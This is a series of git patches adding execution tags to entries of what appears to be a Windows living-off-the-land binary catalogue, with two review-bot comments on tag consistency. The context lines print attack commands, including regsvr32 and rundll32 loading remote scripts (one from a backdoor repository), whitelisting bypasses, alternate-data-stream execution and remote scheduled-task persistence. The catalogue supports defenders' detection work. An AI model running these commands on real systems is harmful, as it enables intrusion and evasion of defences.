diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml
index 2272b263..00863c97 100644
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@@ -5,15 +5,14 @@ Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
 - Command: regasm.exe AllTheThingsx64.dll
- Description: Loads the target .DLL file and executes the RegisterClass function.
+ Description: Loads the target .Net DLL file and executes the RegisterClass function.
 Usecase: Execute code and bypass Application whitelisting
 Category: AWL Bypass
 Privileges: Local Admin
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: DLL
- - Input: Custom Format
+ - Execute: .NetDLL
 - Command: regasm.exe /U AllTheThingsx64.dll
 Description: Loads the target .DLL file and executes the UnRegisterClass function.
 Usecase: Execute code and bypass Application whitelisting
@@ -22,8 +21,7 @@ Commands:
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: DLL
- - Input: Custom Format
+ - Execute: .NetDLL
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
From ce907b4e5c52b8556ec0db85bee0ad3fdf9a57ac Mon Sep 17 00:00:00 2001
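Review bot: In the `@@ -5,15 +5,14 @@` hunk the `regasm.exe /U AllTheThingsx64.dll` entry keeps `Description: Loads the target .DLL file and executes the UnRegisterClass function.` while its tag becomes `- Execute: .NetDLL`, so the description and tag of that entry now disagree; the first entry's description was updated to `.Net DLL` in the same hunk, and the Regsvcs commit on the next line updates both of its descriptions. Change it to `Description: Loads the target .Net DLL file and executes the UnRegisterClass function.`. The hunk also removes `- Input: Custom Format` from both entries, which the commit message ("Changed Tags DLL to .NetDLL") does not mention; if that removal is intended, the message should say so. If the schema validation workflow enumerates allowed tag values, `.NetDLL` presumably needs to be added to that list for the check to pass.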
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:45:00 +0200
Subject: [PATCH 047/148] Update Regsvcs.yml Tags Changed DLL to .NetDLL
---
 yml/OSBinaries/Regsvcs.yml | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)
diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml
index 3a65a66f..1e6d7604 100644
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@@ -5,25 +5,23 @@ Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
 - Command: regsvcs.exe AllTheThingsx64.dll
- Description: Loads the target .DLL file and executes the RegisterClass function.
+ Description: Loads the target .Net DLL file and executes the RegisterClass function.
 Usecase: Execute dll file and bypass Application whitelisting
 Category: Execute
 Privileges: User
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: DLL
- - Input: Custom Format
+ - Execute: .NetDLL
 - Command: regsvcs.exe AllTheThingsx64.dll
- Description: Loads the target .DLL file and executes the RegisterClass function.
+ Description: Loads the target .Net DLL file and executes the RegisterClass function.
 Usecase: Execute dll file and bypass Application whitelisting
 Category: AWL Bypass
 Privileges: Local Admin
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
- - Execute: DLL
- - Input: Custom Format
+ - Execute: .NetDLL
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
From b452a6c3e3705fcab4103cf2189043644ab93a82 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:48:37 +0200
Subject: [PATCH 048/148] Update Regsvr32.yml Tags Added Tags Execute: Remote Execute: SCT
---
 yml/OSBinaries/Regsvr32.yml | 10 ++++++++++
 1 file changed, 10 insertions(+)
diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml
index 27067b81..43dc039d 100644
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
+ - Execute: Remote
 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
 Description: Execute the specified local .SCT script with scrobj.dll.
 Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -18,6 +21,8 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
 - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
 Description: Execute the specified remote .SCT script with scrobj.dll.
 Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@@ -25,6 +30,9 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
+ - Execute: Remote
 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
 Description: Execute the specified local .SCT script with scrobj.dll.
 Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -32,6 +40,8 @@ Commands:
 Privileges: User
 MitreID: T1218.010
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: SCT
 Full_Path:
 - Path: C:\Windows\System32\regsvr32.exe
 - Path: C:\Windows\SysWOW64\regsvr32.exe
From 39adfc286a6829c1a83b4ccf7de7258e4ff2c155 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:53:16 +0200
Subject: [PATCH 049/148] Update Rundll32.yml Tags Added Tags: Execute: JScript Execute: EXE
---
 yml/OSBinaries/Rundll32.yml | 9 +++++++++
 1 file changed, 9 insertions(+)
diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml
index ba5d622d..e1bb40c7 100644
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -29,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: JScript
 - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
 Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
 Usecase: Proxy execution
@@ -36,6 +38,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: JScript
 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
 Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
 Usecase: Proxy execution
@@ -43,6 +47,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: JScript
 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
 Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
 Usecase: Execute code from Internet
@@ -50,6 +56,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: JScript
 - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
 Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
 Usecase: Execute code from alternate data stream
@@ -68,6 +76,7 @@ Commands:
 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
 Tags:
 - Execute: DLL
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\rundll32.exe
 - Path: C:\Windows\SysWOW64\rundll32.exe
From 3346739e4bbcd676b82a79b7eeae64d4383c380d Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:54:20 +0200
Subject: [PATCH 050/148] Update Runexehelper.yml Tags Added Tags: Execute EXE
---
 yml/OSBinaries/Runexehelper.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml
index 4437afe3..545b1c19 100644
--- a/yml/OSBinaries/Runexehelper.yml
+++ b/yml/OSBinaries/Runexehelper.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\windows\system32\runexehelper.exe
 Detection:
From 7047b05fe818038cb1257fa79fa36ecc82417f9f Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:55:13 +0200
Subject: [PATCH 051/148] Update Runonce.yml Tags Added Tags: - Execute: CMD
---
 yml/OSBinaries/Runonce.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml
index b3191dca..fb024752 100644
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: C:\Windows\System32\runonce.exe
 - Path: C:\Windows\SysWOW64\runonce.exe
From a5191c762dddfaf2834a4397fe20c3514849ab3d Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:56:38 +0200
Subject: [PATCH 052/148] Update Runscripthelper.yml Tags Added Tags: Execute Powershell
---
 yml/OSBinaries/Runscripthelper.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml
index d54807b3..2e58c2ed 100644
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ Tags:
+ - Execute: Powershell
 Full_Path:
 - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
 - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
From fb19b66ab326a2c71714e6b49ff75b25f9478285 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:59:15 +0200
Subject: [PATCH 053/148] Update Sc.yml Tags Added Tags: Execute EXE
---
 yml/OSBinaries/Sc.yml | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml
index f8fa24a1..bd016f04 100644
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1564.004
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start
 Description: Modifies an existing service and executes the file stored in the ADS.
 Usecase: Execute binary file hidden inside an alternate data stream
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1564.004
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\sc.exe
 - Path: C:\Windows\SysWOW64\sc.exe
From 83a18ae34271e4dcf3147d10d1c48beb6ee60d54 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 17:00:51 +0200
Subject: [PATCH 054/148] Update Schtasks.yml Tags Added Tags: Execute EXE
---
 yml/OSBinaries/Schtasks.yml | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml
index f439dc8d..c37e48e0 100644
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1053.005
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
 Description: Create a scheduled task on a remote computer for persistence/lateral movement
 Usecase: Create a remote task to run daily relative to the the time of creation
@@ -18,6 +20,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1053.005
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\windows\system32\schtasks.exe
 - Path: c:\windows\syswow64\schtasks.exe
From cb302b5d137e2db17115a68214fed70c1516516c Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 17:04:59 +0200
Subject: [PATCH 055/148] Update Scriptrunner.yml Tags Added Tags: - Execute: EXE - Execute: CMD - Execute: Remote
---
 yml/OSBinaries/Scriptrunner.yml | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml
index be2a779c..4c5b1416 100644
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
 Description: Executes calc.cmd from remote server
 Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@@ -18,6 +20,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: Remote
+ - Execute: CMD
 Full_Path:
 - Path: C:\Windows\System32\scriptrunner.exe
 - Path: C:\Windows\SysWOW64\scriptrunner.exe
From a8649af26a79a58c83613485b0a6eea60fbb2947 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 17:07:22 +0200
Subject: [PATCH 056/148] Update Setres.yml Tags Added Tags: - Execute: EXE
---
 yml/OSBinaries/Setres.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml
index 734aba29..6797060b 100644
--- a/yml/OSBinaries/Setres.yml
+++ b/yml/OSBinaries/Setres.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\windows\system32\setres.exe
 Detection:
From a6de1f24c7853ed0809f76e902bfb8641a1f2dfc Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 17:11:02 +0200
Subject: [PATCH 057/148] Update SettingSyncHost.yml Tags Added Tags: - Execute: EXE
---
 yml/OSBinaries/SettingSyncHost.yml | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml
index aa20ad96..13fb36fa 100644
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 8, Windows 8.1, Windows 10
+ Tags:
+ - Execute: EXE
 - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
 Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
 Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 8, Windows 8.1, Windows 10
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\SettingSyncHost.exe
 - Path: C:\Windows\SysWOW64\SettingSyncHost.exe
From d904027a3d5616c186f6889047638107f452e278 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 17:12:20 +0200
Subject: [PATCH 058/148] Update Ssh.yml Tags Added Tags: Execute EXE
---
 yml/OSBinaries/Ssh.yml | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml
index 4c17e630..6d651b18 100644
--- a/yml/OSBinaries/Ssh.yml
+++ b/yml/OSBinaries/Ssh.yml
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 + Tags: + - Execute: EXE - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: From dfec93e7deec5e6737803c2d8e50da98c4cf860c Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:13:41 +0200 Subject: [PATCH 059/148] Update Stordiag.yml Tags Added Tags: - Execute: EXE --- yml/OSBinaries/Stordiag.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index a2f312ee..aa42bf6a 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe From d6e2244165b36e809d7bd59507e738dba89098d5 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:14:26 +0200 Subject: [PATCH 060/148] Update Syncappvpublishingserver.yml --- yml/OSBinaries/Syncappvpublishingserver.yml | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 085a9827..ec4e8b0a 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 + Tags: + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe From 7d9ce4b53aa2038193c610c28abd098975c22dbc Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:15:47 +0200 Subject: [PATCH 061/148] Update Ttdinject.yml Tags: --- yml/OSBinaries/Ttdinject.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 31c79c15..42f0d664 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 + Tags: + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1909 and below + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe From 9fddf9b1b86ed6bbe1b117af3b6d42f77ceb8ca8 Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:16:29 +0200 Subject: [PATCH 062/148] Update Tttracer.yml Tags Added Tags: Execute EXE --- yml/OSBinaries/Tttracer.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index d2125bd0..c12ae91f 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 + Tags: + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID From e3df4d36512bea6561c5e32daf71384657649d69 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:20:57 +0200 Subject: [PATCH 063/148] Update Unregmp2.yml Tags Added Tags: - Execute: EXE --- yml/OSBinaries/Unregmp2.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index d05fd20e..fabfae40 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe From 615dd804f2ca8684ce2e5d2bd29a963e08b80fc1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:22:53 +0200 Subject: [PATCH 064/148] Update Vbc.yml Tags Removed Execute Tags as it is a compilation --- yml/OSBinaries/Vbc.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 0511e95b..4ede8878 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml 
@@ -11,8 +11,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -20,8 +18,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe From 9464d668047e55f17f0db527c64399aa134375a0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:25:54 +0200 Subject: [PATCH 065/148] Update Verclsid.yml tags Add Tags: Execute DLL --- yml/OSBinaries/Verclsid.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index cf8fa722..27511832 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe From 266a379bc92feea49e8c089fd860d43768bbd14e Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:26:31 +0200 Subject: [PATCH 066/148] Update Wab.yml Tags Added Tags: Execute DLL --- yml/OSBinaries/Wab.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index 6bec321a..c8e61fce 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe From 7a5c247dacfd8a13a4859c5079253aaabded89f6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:27:59 +0200 Subject: [PATCH 067/148] Update Winget.yml Tags Added Tags: - Execute: Remote - Execute: EXE --- yml/OSBinaries/Winget.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index f5ad51eb..d6be4bc4 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -11,6 +11,9 @@ Commands: Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked From e792f14b9a5aff1ca9437fb6e37610adc2332af6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 17:28:47 +0200 Subject: [PATCH 068/148] Update Wlrmdr.yml Tags Added Tags: Execute: EXE --- yml/OSBinaries/Wlrmdr.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 9ceccc76..10f96cce 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml 
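Review bot: In the Winget.yml hunk (`@@ -11,6 +11,9 @@`) the `Execute: Remote` tag is attached to the entry whose Privileges line reads "Local Administrator - required to enable local manifest setting", which suggests a local-manifest install; that entry's Command line sits above the hunk, so the tag should be checked against it before it is kept. If the command really installs from a local manifest, the block here should carry only `- Execute: EXE`, and `Execute: Remote` belongs on the `-s msstore` entry that follows (its own Tags block is outside this hunk). Either way the MitreID on the same entry (T1105) and the tag set describe the same behaviour and should be reconciled in one change.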
